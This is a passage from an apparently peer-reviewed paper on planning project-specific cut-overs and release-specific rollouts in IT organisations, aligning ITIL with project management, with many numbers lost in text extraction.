facilitate only one rollout window. in the same way as the project’s go-live strategy, the release-specific rollout uses a go-live strategy for the release. in this illustration, the rollout of release utilizes a sequential rollout strategy and the rollout of release a parallel rollout strategy. the release model presented in fig. illustrates the following generic phases, which are quite similar in the case of it-related projects: • project-planning phase • design phase • realization phase • test phase • cut-over phase • support phase. quality management is facilitated in order to request these cut-over relevant project deliverables, which are then reviewed by rollout management. table illustrates potential deliverables (nageldinger, ). some of them are mandatory, others are optional. these deliverables are further elaborated here below and presented according to their project phases. nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table project-specific deliverables for cut-over planning. bold font used for deliverables related to rollout management; italic font used for optional deliverables which are not evaluated by quality management; normal font used for mandatory deliverables. project planning design realization test cut-over support plan for deployment management system-profile description decision model presentation for the go-live & fallback strategy final cut-over plan operational cut-over observation of incidents establish cut-over manager (com) position system landscape design (slde) decision related to the go-live & fallback strategy fallback concept lessons learned initial dialogue with rollout management extension to slde due to go-live strategy one-pager disaster- recovery concept go-live strategy draft cut-over plan plan for the deploy- ment of personnel fallback strategy risk register cut-over test framework for cut-over planning dependency matrix go-live simulation stakeholder analysis dialogue with rollout management kick-off communication plan completely defined cut-over team table activity types used for a rollout/cut-over schedule. ordinary activities are not assigned an activity type. activity type explanation info someone needs to be informed, usually by e-mail. checkpoint technical verification point within cut-over/rollout flow. optional activity is conducted only for certain rollouts; if the activity is not required then the time is set to . security security-related activity, such as back-up or the implementation of restore points. handover handover of a certain document, protocol etc. unique non-recurring activity within the rollout flow; commonly relates to a project and is therefore not facilitated for other rollouts. breakpoints breakpoints are used during task or process chains in order to verify intermediate results. this activity type relates to these breakpoints. comment project-planning tools often provide limited functionality related to comments within the working breakdown structure (wbs). comments are activities with time = and are merely used to provide additional information within the wbs. project-planning phase the preparation of a project-specific cut-over already needs to be considered during the planning phase of a project. key deliverables are (i) a decision related to the establishment of a cut-over manager position, (ii) an agreement on cut-over specific deliverables, which are included (iii) within a plan for deployment management. nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. plan for deployment management in order to deliver a cut-over plan on time it is important that the cut-over related deliverables and outcomes are already taken into consideration during the planning phase of a project. larger projects will probably require a separate schedule for all cut-over related planning tasks and activities, whereas smaller projects include them in their overall project schedule. here, this key deliverable is called deployment management plan. please note that these tasks relate solely to the necessary preparation and planning work and not to the cut-over schedule itself. establish cut-over manager (com) position during the planning phase it needs to be decided whether a cut-over manager (com) position is to be implemented. the com role may be compared with the role of a project manager; it is solely an administrative role which covers it-related topics as well as business related ones. the only difference is that the com focuses on the preparation work associated with activities conducted within the cut-over window. a com is responsible for the preparation, planning and execution of the project-specific cut-over. he or she needs to be positioned beside the project manager and should be part of the steering committee. this is because conflicts of interest are likely to occur between the com and the project manager. additionally, a com needs to drive decisions and potential change-requests related to the cut-over; many of these bear associated risks. a common role for a com would include the following responsibilities: • drive a decision on the final go-live strategy • implementation and guidance of a cut-over team • creation of a cut-over plan • creation of a list with initial conditions required to be met prior to the cut-over • initiating a list of activities after cut-over • planning, execution and organization of the cut-over-test and go-live-simulation. smaller projects do not usually need a com as the project manager fulfils this role. initial dialogue with rollout management during the project-planning phase an initial dialogue with rollout management is mandatory because related deliverables need to be scaled to the project size. this scaling is quite difficult to automate since it depends on experience and the potential interfaces involved. a simple formula, for example based on the project budget, is insufficient. design phase prior to completion of the design phase, the go-live strategy and fallback strategy should be finalized. depending on the project size, these key deliverables can be combined and should provide a top-level description of options on how to transition the project to a productive environment, as well as how the initial state can be restored. nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. go-live strategy the go-live strategy is of an investigative nature. it should provide several potential go-live options with their associated impacts, rather than an ultimate solution. it should foster discussions related to the topic. the idea is to provide a general overview and associated opinions. this document is later used to balance stakeholder interests and to carve out the final go-live method. a go-live strategy starts with the go-live scope. how does the go-live scope differ from the project scope? practically speaking, the go-live scope is the elaborated version of the initial project scope and it is therefore more concrete. the project scope, for example, can state the introduction of a system to meet the purpose xyz. a go-live scope needs to state precisely which system is going to be implemented, lists the technology involved and states the required organizational changes. a project scope, for example, can state the improvement of a process. the go-live scope needs to state how a particular process is to be improved and which changes are required to be conducted. it is recommended to define the go-live scope in writing during a workshop attended by all project key players. this exercise is valuable for the overall project, as well as in identifying scope changes already occurring. a properly defined go-live scope is a prerequisite for evaluating all other cut-over relevant questions. the go-live strategy covers the following aspects: • a description on how the project can be transitioned to the live environment. the description can be of generic nature and should relate to the major approaches, such as big-bang, phased go-live, or iterative methods. • it is highly recommended to provide several go-live options which identify and provide for the various associated risks. • many go-live scenarios potentially impact the business and technical infrastructure. the impact and its potential consequences should be discussed with the stakeholders. their opinion should be included within the go-live strategy and referenced as well. • alternative go-live approaches, which are probably not investigated further, should be defined and recorded. additionally, it should be recorded why particular options are not followed up. • one section should focus on potential go-live dates. again, rather than providing one ideal date, several potential dates should be evaluated. what are the benefits and catches of these dates? which dates could be used as an alternative, in case of project delays? who recommends these dates? what is the reasoning behind them? • a cut-over window usually last for just a few hours. however, some projects require a weekend. which constraints and risks are associated with the cut-over timeframe? what are the stakeholders’ wishes? why do they request a shorter or longer timeframe? • many projects alter existing business processes. these changes should be addressed in form of an as-is and to-be description. which processes are newly introduced, altered or deactivated? departments which are impacted should be identified as well. who are the key contact persons? nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. • some projects alter the organization. if this is the case, what does the new organization look like? a section of the project plan should describe and illustrate the old and new organization. it should highlight the targeted changes, as well as how the targeted changes are to be achieved. are the change constraints related to the timeframe? projects with significant reorganization focus should employ an organizational change management task force which delivers this information. • since people tend to change their opinion or might need to be contacted later for this, further discussions on all related references should be logged. • how many people are going to be impacted during and after a potential go-live? the impact can be of a technical, organizational and/or business nature. it is an open secret that many companies do not document their business processes. major implementation projects therefore require this task to be conducted. the go-live strategy needs to focus on the targeted change by comparing the as-is with the to-be state. it outlines transition options in order to cut-over a project to a productive environment. these transition options also include the technical aspects and system landscape. however, the technical documentation of the as-is and to-be is usually conducted in a separate document, here called a ‘system landscape design’ (slde) document. system landscape design (slde) the creation of an slde is commonly the task of a core technology or it architecture department. for further cut-over planning it is obviously essential that this document exists, and that the current as well as the future system landscape is not only presented in a graphical manner but also properly described. even though some companies have a configuration management database (cmdb) in place, the information available is frequently not newsworthy or lacks information required by the project. the creation of an slde is therefore a task which needs to be foreseen in most it implementation projects. from the cut-over perspective additional questions need to answered, for example: • who are the applications contact persons (such as business owner, administrator, key users etc.)? • which business process are linked to the as-is and to-be system landscape? • which departments currently work with the applications involved? • a list of associated applications • a list of interfaces, their business objective and the technical protocol used. extension to slde certain go-live approaches require an extension of the slde, which is treated here as a separate deliverable in order that it is not forgotten. extensions are, for example, particular interfaces for data-migration purposes. system landscapes related to the proposed test methodology as well as the go-live simulation and the cut-over test, which are explained further below, are also important extensions of the slde. nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. system profile description if a project is initiated in an environment where a cmdb is missing or not sufficiently maintained, then system-profile descriptions need to be created; this is commonly conducted in the form of a survey. such a survey should be conducted together with the department which already owns the cmdb. it is therefore advisable during the project-planning phase to conduct a brief review on how well the system landscape is documented and to foresee the system-profile descriptions as an evaluation task within the project schedule, since this task can become quite time-consuming. fallback strategy the fallback strategy should be defined in writing within the same timeframe as the go-live strategy. it provides a top-level draft of the potential activities required in order to reinstall the initial state prior to the start of cut-over. the detailed version of this document, here called ‘fallback concept’, will be created later and finalized during the test phase. the fallback strategy addresses the following questions: • how can the system landscape be rolled back to its state prior to the start of cut-over? are further scenarios possible? • how long would such a fallback procedure take? • which criteria or conditions should trigger a fallback? • which risks are associated with each fallback option provided? what do their mitigation strategies look like? • in case of a fallback, how great is the potential business impact? can the potential impact be quantified? how great is the impact in case a foreseen fallback scenario fails? how likely is it to occur? how great is the impact in case the system landscape involved is unavailable for one day? how many days can a business survive without it? • which model should be used in order to calculate the business impact? • what is the maximum acceptable downtime? how is it calculated? are service level agreements (slas) jeopardized? how great are the potential contractual penalties? • where can potential pors be positioned? where is the ponr? do all relevant systems have a disaster recovery concept in place, in case the ponr has been reached and things go wrong? is it possible to assign a potential business impact to each por identified? what are the termination criteria associated with each por? the questions provided are obviously not complete, but are intended to illustrate the potential complexity involved. communication-related deliverables cut-over management is communication management, and related deliverables such as a communication plan, a stakeholder analysis and a kick-off, to mention just a few, do not differ from ordinary project-management methodologies and are therefore not further elaborated here. however, these methodologies need to be applied within the cut-over context. a warehouseman, for example, is unlikely to be part of an ordinary nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. project stakeholder analysis. however, within a cut-over context, a warehouseman can be an important key player. by the end of the design phase the cut-over team should be defined. the cut-over team consists of all people required to contribute to the cut-over deliverables explained within this section. the cut-over team also should be completely defined by the end of the design phase. communication-related deliverables are recommended not to be evaluated during a potential assessment. this is because both a go-live strategy and a fallback strategy require these communication items to be in place in order to prove that all important stakeholders’ views have been considered. the framework for cut-over planning can also been seen as a communication-related deliverable. it is a document which describes how planning for the cut-over is to be conducted, and which cut-over related deliverables are to be produced. such a document is obviously only advisable for larger cut-over tasks and is therefore not mandatory. realization phase decision related to the go-live and fallback strategy the decision related to the go-live and fallback strategy is a key outcome of the realization phase. it needs to be conducted by the steering committee since it relates to the triple constraints, such as scope, timeframe, budget and risk. the decision is required to be prepared in form of a decision-model presentation and commonly extensively discussed, prior to a steering committee meeting. it is then up to the members of the steering committee to consult or involve further senior management if the go-live risks associated require this. this decision may present several political challenges and if it is conducted too late then the timely delivery of the project is at risk. one-pager the one-pager summarizes the go-live and fallback strategy decided. it is later integrated within the release-specific rollout handbook. the objective of the one-pager is to inform all other projects and participating parties about the rollout and to facilitate the preparation of the release-specific rollout. draft cut-over plan the cut-over plan and the cut-over schedule are not the same and are explained further below, within the context of the rollout handbook. the cut-over schedule is an important part of the cut-over plan. as a minimum requirement a draft cut-over schedule should be available at the end of the realization phase, sufficient to support the planning activities for the release-specific rollout. since the term ‘draft’ can be interpreted in several ways, it is suggested to define the outcome in advance in order to avoid disappointment at the end of the realization phase. this draft schedule should contain all activity blocks, with their subordinated activities as well as their durations, dependencies within these activity blocks, with an attached working breakdown structure (wbs) and a glossary. nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. risk register the cut-over related risk register does not differ much from an ordinary project risk register. the administrative work of this risk register should be kept to a minimum, since the risks solely relate to the cut-over. however, it is still necessary that such a record is properly administrated. since key elements of such a risk register are quite frequently forgotten, such as the risk owner or risk indicator, a practical set of parameters are suggested here, such as: • risk id: the id number assigned to the risk • risk category: a sorting criterion used to categorise risks. commonly used categories are, for example, applications or phases during a rollout. • risk description: this can follow a simple scheme by addressing three questions: (i) what is the actual risk? (ii) how is the risk caused? (iii) what is the impact if the risk does occur? • alerter: can be anyone who identifies and reports a risk. • alerting date: the date on which a risk has been recorded. • magnitude: calculated on the basis of the probability and potential impact of a risk occurrence. • risk indicator: criteria used to recognize that a risk has manifested itself; for instance, error messages after a database update etc. • mitigation measure: a counter-action that can be taken if a risk manifests itself. • risk owner: a person with the assigned authority and competency to mitigate a risk. the risk owner identifies mitigation strategies, defines risk indicators and nominates a technical contact for the respective rollout. this role also includes refining the risk description, since the risk as such is frequently confused with the causes of a risk. • technical contact: a technical expert or a team which shares the required technical expertise and is in any case present during the rollout, usually fulfils this role. this person is responsible during the rollout (i) to verify whether a risk has manifested itself, and (ii) to coordinate mitigation measures defined within the risk register. • processing status: describes how far the processing of the risk has progressed. • new: a new risk has been recorded, described and assigned to an initial risk owner; • under way: the risk owner has accepted his role for the particular risk raised, and communicates a delivery date on which the mitigation measures and risk indicator are defined; • completed: as soon as the mitigation measures and risk indicator are described and a technical contact for the particular risk has been nominated, risk processing has been completed. • completion date: the date on which processing status is set to ‘completed’. nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure dependency matrix. illustration of a dependency matrix, which is used as a tool for the evaluation of the (potential) impact and interrelations between project teams and core teams; each bold point symbolizes an interaction between a project team and a core team; the sum of interactions is a criterion for the complexity of a project as well as a release. dependency matrix a collective participation by projects in a release-specific rollout causes a need to manage dependencies. these dependencies can occur between project teams as well as jointly used personnel resources, here called ‘core teams’. the dependency matrix is a tool used to evaluate the potential impact and interrelation between project teams and core teams. project leads are requested to fill out a template and to identify which key personnel are required to be present during the cut-over. the dependency matrix is hard to define as a tool because the terms (i) ‘core team’ as well as (ii) ‘dependency’ are themselves difficult to define. here, a core team is seen as a heterogeneous group of key personnel required to be present during a cut-over/rollout. it consists, for example, of administrative personnel related to key applications and databases as well as service owners (within an itil context). a dependency between a project team and a core team is present if communication between the project team and the core team or its related technology is necessary during cut-over/rollout. since project teams usually identify similar core teams, a template can be created. this is illustrated in fig. . the bold points visualize dependencies between project teams and core teams participating in a release. even though the term ‘core team’ is treated less strictly, these dependencies can be facilitated to quantify the complexity of a release. complex projects usually require more key personnel than less complex projects. a complex release usually consists of several projects with many dependencies. therefore, one possible measurement of the complexity of a release is the total amount of dependencies. this idea is further elaborated below. additionally, such a dependency matrix is quite a sensible instrument to have in order to nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. identify projects which have probably influenced a particular business process negatively after rollout. dialogue with rollout management projects are requested to pass a gate prior entering the release phase, which consists of a variety of project deliverables. most of the cut-over related deliverables have already presented here, such as (i) the decision related to the go-live strategy, (ii) the cut-over plan (draft), (iii) a risk register, (iv) dependency matrix and (v) an obligatory dialogue with rollout management. the cut-over related deliverables are discussed during the dialogue along with a couple of questions which the rollout manager is to address. test phase during the test phase the cut-over plan and fallback concept need to be finalized. the disaster recovery concept relates to the period after the point-of-no-return (ponr) and is required to be produced for new systems or potentially extended for existing systems. it has already been mentioned that an insufficiently documented system landscape can severely affect a project’s progress. it should therefore already been evaluated during the project planning phase whether sufficiently documented disaster recovery concepts are in place for existing systems. after completing the integration tests, a cut-over test and ago-live simulation should be conducted. the cut-over test is usually the last test prior to the rollout with the objective of validating the cut-over schedule. some steps are simply conducted in an exemplary fashion, such as data migration. this is in particular valid if a huge amount of data is required to be migrated. a cut-over test would also cover a couple of fallback scenarios and (if necessary) a disaster recovery case as well. a second form of validation is what this paper refers to as the ‘go-live simulation’, which has more similarities to a rehearsal than a test. the go-live simulation focuses on the communication requirements during a cut-over and necessary delivery points. it should be conducted with the whole cut-over team (personnel involved in the cut-over) in place under circumstances which are close to the real cut-over situation. for this reason the plan for the deployment of personnel should be in place as well. both the cut-over test as well as the go-live simulation can be conducted solely for a particular project and/or together with other projects as part of a release. the scope of both validation forms needs to be defined as part of the decision related to the go-live strategy during the realization phase. the effort required to conduct these tests is quite significant, since it landscapes close to the live environment are required. cut-over and support phase during the cut-over phase the operative cut-over is to be conducted either with other projects in form of a release, or by one project alone. in the latter case, the project does not participate in a release and conducts a project-specific cut-over independently. such an independent cut-over is most likely conducted in large-scale projects. itil recommends a support phase as part of the release and deployment process (rance, ). however, support can only be provided by the personnel who have supporting nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. knowledge, that is, knowledge which can be provided exclusively by the project teams and not by the personnel owning the release and deployment process. it is therefore argued that after the end of the rollout window, the subsequent support phase is required to be covered by the project teams. it is advisable to incorporate a specific period for the observation of incidents after cut-over or rollout prior to the lessons-learned workshop. this observational period lasts from to weeks and obviously depends on the complexity of the project or release. this aspect is further developed below, together with recommendations on how to run a lessons-learned workshop. recommended deliverables and outcomes for the preparation of a release-specific rollout this chapter highlights a couple of important deliverables and outcomes of the release-specific rollout management. large-scale projects which are likely to cut-over independently may consider the outcomes described here as well, even though these are assigned to the release phase. the rollout handbook the planning document and key deliverable for the release-specific rollout is the rollout handbook. this may be compared with the project plan defined in the pmbok r⃝. however, it relates solely to the release-specific rollout. the pmbok r⃝ (pmi, ) defines a project plan as a “. . . formal, approved document used to guide both project execution and project control. the primary uses of the project plan are to document planning assumptions and decisions, facilitate communication among stakeholders, and document approved scope, cost and schedule baselines. a project plan may be summarized or detailed.” even though the rollout handbook is structured to the same degree as a project plan, it is only finalised shortly prior to the actual rollout. a classic project plan, however, needs to be completed at the beginning of the project, during the planning phase. the rollout handbook consists of the following items: executive summary: describes the major rollout activities, participating projects and applications, highlights major risks and provides an overview chart of the rollout windows. version history: the rollout handbook is to be extended and adjusted throughout the whole release phase. it is therefore important to publish temporary versions of this book in regular iterations, so that it can be reviewed. a version history is therefore crucial in order to keep track of these changes. communication plan: lists all participating persons with their contact details. communi- cation related to the rollout is part of the rollout schedule and describes who needs to be contacted when and with what information. the communication plan also includes the plan for the deployment of personnel in all participating project teams and core teams. nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. risk register: aggregates the risk logs of all participating projects into a simple excel format. the format of the risk log is equal to the one described above. description of rollout window: is usually accompanied by a visual presentation and summarizes major activities such a data migration or deployments on specific systems. an important item of this description is a table including all participating projects, their associated deployment times and points-of-use. one-pager of all participating projects: defines the scope of the rollout. schedule management: a rollout schedule is quite similar to an ordinary project schedule; however, some distinct differences exist. it-implementation projects usually have a timeframe of several months and are referred to ordinary projects in this paper. the release-specific rollout only lasts for a couple of hours. ordinary project schedules are usually managed with duration-based or effort-based methods. a rollout can only be scheduled by duration-based approaches, since the duration of most activities is fixed. here, the duration of tasks is usually scheduled on an hourly/minute basis. rollout schedules need to have activity ids and not only row numbers. what is the difference? scheduling is commonly conducted with planning tools which facilitate row numbers. the planning tools use these line numbers for various calculations. however, they are also likely to be changed quite frequently if the plan is changed. in order to avoid communication issues, particularly during the operative rollout, alphanumerical ids should additionally be used. it is recommended to assign activity types to activities, see also table . why? firstly, rollout schedules are very likely to be reused. this reusability is obviously much easier if unique activities, those that are just used once for a particular rollout, are sufficiently labelled. additionally, a rollout plan is much easier to read if the operator knows already in advance, for example from the use of particular colours, what types of activities are expected, such as communication activities or checkpoints. communication during release planning preparation work related to the release-specific rollout mainly covers coordination meetings with project teams and associated core teams participating in the release. additionally, a large number of staff is required to be informed about the status related to the rollout preparation within the company. a rollout newsletter is a fit-for-purpose communication tool which can be easily customized to cover the coordination aspect and meet the corporate information need. the release model illustrated here is used in such a manner that rollouts are conducted on an annual basis, which results in an approximately -week preparation cycle for every rollout. a typical schedule related to the planning activities and publication dates of such a release cycle is illustrated in fig. . the newsletter is published about every other week. it comprises topics related to the rollout preparation work, as well as subjects related to general it questions such as new documents and procedures published by the security personnel, changes conducted by the change management etc. the newsletter is – pages long and announces deadlines and important dates, such as the date for the approval of nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure planning activities of the release. schedule of planning activities of the release, associated with the publication time of rollout newsletter. the rollout handbook, which is done during a meeting with all key personnel. documents related to the newsletter, such as the rollout handbook, are stored on ms sharepoint r⃝. this provides the desirable function of enabling distribution of the newsletter to a wider community and limiting access to more confidential documentation. the th edition is published a couple of days prior to rollout. by this stage the rollout handbook is in a final stage and everybody involved has a last chance to incorporate necessary changes. the newsletter publishes the major steps involved during the rollout, key contact phone numbers and an overview illustration. all interested parties thus know the overall picture of the rollout, whereas access to the rollout handbook is restricted. the th edition publishes all major planning steps and dates for the preparation work of the following rollout as well. the st edition focuses on the incidents after the rollout. incidents are observed up to weeks after the rollout. the observation period closes with a lessons-learned workshop, the submission of the final report and the closure of the rollout change (see further below for the treatment of the rollout change). the nd and rd editions provide temporary planning results and draft versions of the rollout handbook. planning is conducted in three phases: during the st phase, interviews are conducted between rollout management and project teams, see table for the deliverable ‘dialogue with rollout management’. during the nd phase, rollout management interviews the core teams, and throughout the rd phase fine tuning of the rollout handbook is carried out. nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. rollout change there is no universal measure on how to organize changes. obviously, it-service organizations need to record changes related to their system landscape; however, the way these are recorded, the level of detail and types of changes used differ significantly between organizations. what is a rollout change? the rollout change relates to the changes caused by the release-specific rollout. however, it only covers the release-specific rollout window. it has already been highlighted above that a project can cause damage in potentially two ways: firstly during the software deployment and secondly at the point-of-use. if the point-of-use falls outside the rollout window then it is not covered by the rollout change. in this case an additional change is required to be recorded. for this reason the rollout handbook contains a register which lists the deployment window and point-of-use for every project. the rollout handbook is appended to the rollout change as well. the rollout change is created at the beginning of the release phase and then iteratively extended by updating the attached rollout handbook. once this handbook has been approved or is present in its final format, the change is requested to be approved by the change advisory board (cab). the change is closed after the completion of the lessons-learned workshop, described in the next section. lessons-learned workshop above it has already been explained that a lessons-learned workshop should be conducted after completion of the rollout. lessons-learned workshops provide many generic benefits, such as: • the reuse of knowledge throughout an organization • the reduction of project cost • the improvement of methods and practices, and • the enhancement of project delivery and quality management just to mention a few of them. however, the lessons-learned workshop mentioned here relates solely to the rollout conducted and is not of generic nature. let us step back a little to add some higher-level perspective. any it organization has a need to improve its processes, ensure agreed service levels and justify its projects or initiatives. for this reason, continuous service improvement (csi) represents one of itil’s five process groups. the csi register, which lists all improvement options and initiatives, is one of an it organization’s key deliverables (cabinet office, ). key performance indicators (kpis) are used to measure the process. how can we measure the success of a rollout? what do we mean by success? itil publications already suggest a variety of kpis, such as the number of incidents caused after the release-specific rollout. these simple kpis can, when implemented in practice, be quite tricky. even though this particular kpi is suggested for the service validation and test process within itil’s service transition process group (rance, ), incidents are always a good indication of disturbances and are here also used for the evaluation of the rollout’s success. figure illustrates the total number of incidents recorded within one it nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure illustration of incidents during a two-year period. dotted lines illustrate week of rollout with release names; data relate to the total number of incidents recorded. actual incident numbers are disclosed due to confidentiality reasons. service organization. the dotted lines indicate the week during which a rollout occurred. the sharp decline of incidents during cw is because a service-request process was introduced. the dips between and incidents/week are caused by the christmas season, where many people are on holiday. otherwise, it is quite difficult to acknowledge any impact of the rollout on the total number of incidents recorded. the picture changes once we take a closer look at a particular system. figure illustrates second-level incidents for a main order-handling system, which participated in all rollouts. these incidents account for about % of the total number of incidents recorded. after some rollouts a rise of incidents can be observed. how should we measure this? figure shows the variability of incidents four weeks before and after rollout. the connecting lines are to aid visualisation of the form of the curves and are not intended to suggest data points at all. the data provided are normalized. here, the mean value of incidents during a period of four weeks before rollout is set to %, with a standard deviation of ± %. the figure suggests a significant increase of incidents – weeks after rollout. this increase is summarized in fig. , where the average increase in incidents two weeks after rollout is plotted. most rollouts show a significant increase. the negative value occurred during the summer holiday period time, when less people recorded and reported incidents. the values provided have been incorporated for illustrative purposes. it is hardly surprising that if the number of projects participating in a rollout increases, then the number of incidents increases as well. figure shows a correlation coefficient of . between the average increase of incidents two weeks after rollout and the number of participating projects per release. if we consider the complexity of a rollout as introduced above, see also fig. , which is the total number of interactions between project teams and core teams participating in a rollout, then we obtain a similar correlation coefficient of nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure second-level incidents of a main order-handling system. illustration of incidents during a two-year period. dotted lines illustrate week of rollout with release names; data relate to second-level incidents of a main order-handling system, which participates in all rollouts. figure variability of incidents four weeks before and after rollout. connecting lines visualize the form of the curves; the mean value of incidents during a period of four weeks before rollout is set to %, with a standard deviation of ± %. . , see fig. . the high level of incidents provides a good primary source of information on how well the rollout and release performed. however, these data should only be used indicatively and need to be interpreted carefully, as: • processes or the ways processes are managed change over time, such as the above- mentioned introduction of a service-request process, which reduced the number of incidents nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure average increase of incidents two weeks after rollout. standard deviation is ± % as illustrated in fig. ; names label the rollouts, which are plotted on a timeline in fig. . figure correlation coefficient a. correlation coefficient of . between the average increase in incidents two weeks after rollout and the number of participating projects per release. nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure correlation coefficient b. correlation coefficient of . between average increase of incidents two weeks after rollout and the complexity per rollout. • some projects separate their cut-over and point-of-use. incidents can, for example, pop up two or three weeks after rollout once the software goes live • the number of incidents recorded is impacted by seasonal variability, such as holiday periods and christmas • changes are conducted after and prior to rollout, and can significantly influence the statistics. in order to learn what actually caused these incidents they need to be examined in a more detailed manner, which is the purpose of the lessons-learned workshop recommended here. the lessons-learned workshop should be attended by all key personnel involved, such as the project manager/cut-over manager of the participating projects, test manager, and staff involved in the resolution of nd and rd level incidents—just to mention some of them. in order to run such a workshop it is essential to identify the incidents/service requests most frequently caused by the rollout and to classify them. these incident categories are used solely for rollout-evaluation purposes and additionally to the ordinary classification scheme, which is part of the incident-management process. table provides an example of typical incident categories used after rollout evaluation. between and % of the incidents evaluated have usually not been detected by the test. incidents caused due to bad rollout schedule or descriptions are rare. this suggests that the evaluation of incidents as such is more a measure of the test quality than of the rollout planning and execution performance. nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table incident categories used solely for rollout evaluation. this classification scheme isused in addition to the schema already facilitated by the incident management process, which is not further described here. incident category description error within release/ not detected through testing incident was caused by a software error which was not detected in testing. this category is also used for service requests, which fix release-specific errors, e.g., in the form of patches. human failure this category is used for incidents caused by human failure, such as faulty execution of patches or noncompliance with agreements. incident caused by project incident is related to a project; this category makes particular sense if a significant number of incidents are related to a particular project. rollout schedule requires change activity required to be conducted was not properly described. if it is a reoccurring activity then the description needs to change. expected behaviour irregularities recorded are considered to be an accepted and expected behaviour of the system or application. sequential error within the rollout schedule (application-specific) incident is caused by a sequential error within the rollout schedule; activity was requested to be conducted by an application which regularly participates during the rollout. sequential error within the rollout schedule (project-specific) incident is caused by a sequential error within the rollout schedule; the activity was requested to be conducted by a project team. bugfix this category relates to incident-response measures which occur prior to the rollout and which aim to eliminate software error. it is merely a convention to relate them to the rollout change, which also fixes these errors. missing contact person the contact person who logged this change could not be contacted. the number of incidents assigned to this category should be kept small. incident is not reproducible the incident cannot be reproduced. wrongly connected incident was not related to the rollout change and was wrongly related. not classifiable incident cannot be classified with available classification; the classification is of course extended with additional categories where required. one of the challenges these workshops face is related to the proper assignment of incidents to the rollout change. the application-specific increase of nd level incidents after rollout provides a good indication of the expected number of incidents required for analysis. the second kpi introduced is specifically designed to measure the planning and execution performance of a rollout. here, the scheduled time is compared with the actual execution time. the measurement can easily be conducted by the inclusion of communication items within the rollout schedule, such as e-mails. these e-mails are sent by the rollout personnel shortly prior to execution of critical items, here called ‘measurement points’. the time stamps of these e-mails provide a measure of the actual execution time. figure illustrates the discrepancy between the scheduled time (open circles) and actual execution time (closed circles). if the closed circles are below the open ones then the actual rollout was executed quicker than foreseen. if vice versa, a delay occurred. figure illustrates that the activity related to measurement point finished sooner than foreseen. the activity related to measurement point , however, was delayed. nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure discrepancy between the scheduled time and actually executed time. illustration of the discrepancy between the scheduled time and actually executed time for nine measurement points. such a diagram provides a good basis for a structured discussion on why certain rollout activities started later or finished earlier. conclusions within this publication a deployment framework is presented which illustrates how good itil management practices can be aligned with a project-management model in order to assure timely delivery of what this paper refers to as ‘project-specific cut-over’. this alignment is shown by the use of a semi-agile release model. due to the release model selected, which is particularly characterized by its bundling of projects for what is here referred to as ‘release-specific rollout’, a new definition and interpretation of itil’s generic view of deployment is required. the facilitated release model additionally required two types of go-live scenarios: one for each participating project and one for each release. in order to finalize a project-specific cut-over punctually, a variety of cut-over related deliverables are presented and chronologically assigned to a typical it project managed in a nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. cascading manner. projects already need to take into account cut-over related deliverables during the initial planning phase. it is also shown how project-specific outcomes interrelate with release-specific planning activities and are finally aggregated within the rollout handbook and proposed as rollout change for approval by the cab. emphasis is placed on the lessons-learned workshop recommended to be conducted a couple of weeks after the rollout, once the level of incidents has normalised. this workshop should be guided by the rollout/cut-over related incidents, and a comparison of the scheduled time and actual execution time of the rollout should be included in the workshop. even though consulting methodologies such as asap (accelerated sap) recommend scattered, project-specific deliverables useful for cut-over planning, this publication offers an integrated approach on how to systematically prepare for a project-specific cut-over with all required deliverables. the framework provided extends the itil release and deployment process by means of it projects and allows it projects to interface easily with the itil change-management process. the framework has proven to be successful since it forces projects to think already during the planning phase about cut-over related topics. after implementation of this framework we see projects better prepared prior entering the release. however, we also do have projects which wish to cut-over by the use of their own methodology. probably this formal approach is not everybody’s cup of tea. acknowledgements i would especially like to thank andreas veldmann for the constantly inspiring discussions and his substantial help in the implementation of this framework. thanks are also due to necla demirci, gerd heyken and joachim kunze for many stimulating discussions on this paper and related work. i am particularly grateful to sebastian evert, dr sebastian diedrich and enrico voigt for providing incident-related data from cherwell’s it service management software. i am very grateful to jim blake at world world hamburg for editing the english version of this paper. additional information and declarations funding the research related to the implementation of the framework described in this paper has been made possible by the department of test and release management of otto (gmbh & co kg) which is a member of the otto group. the framework presented here in the form of an illustrative case study arose during my consultancy work and has been implemented for some applications within the department of testing and release management at the otto (gmbh & co kg). grant 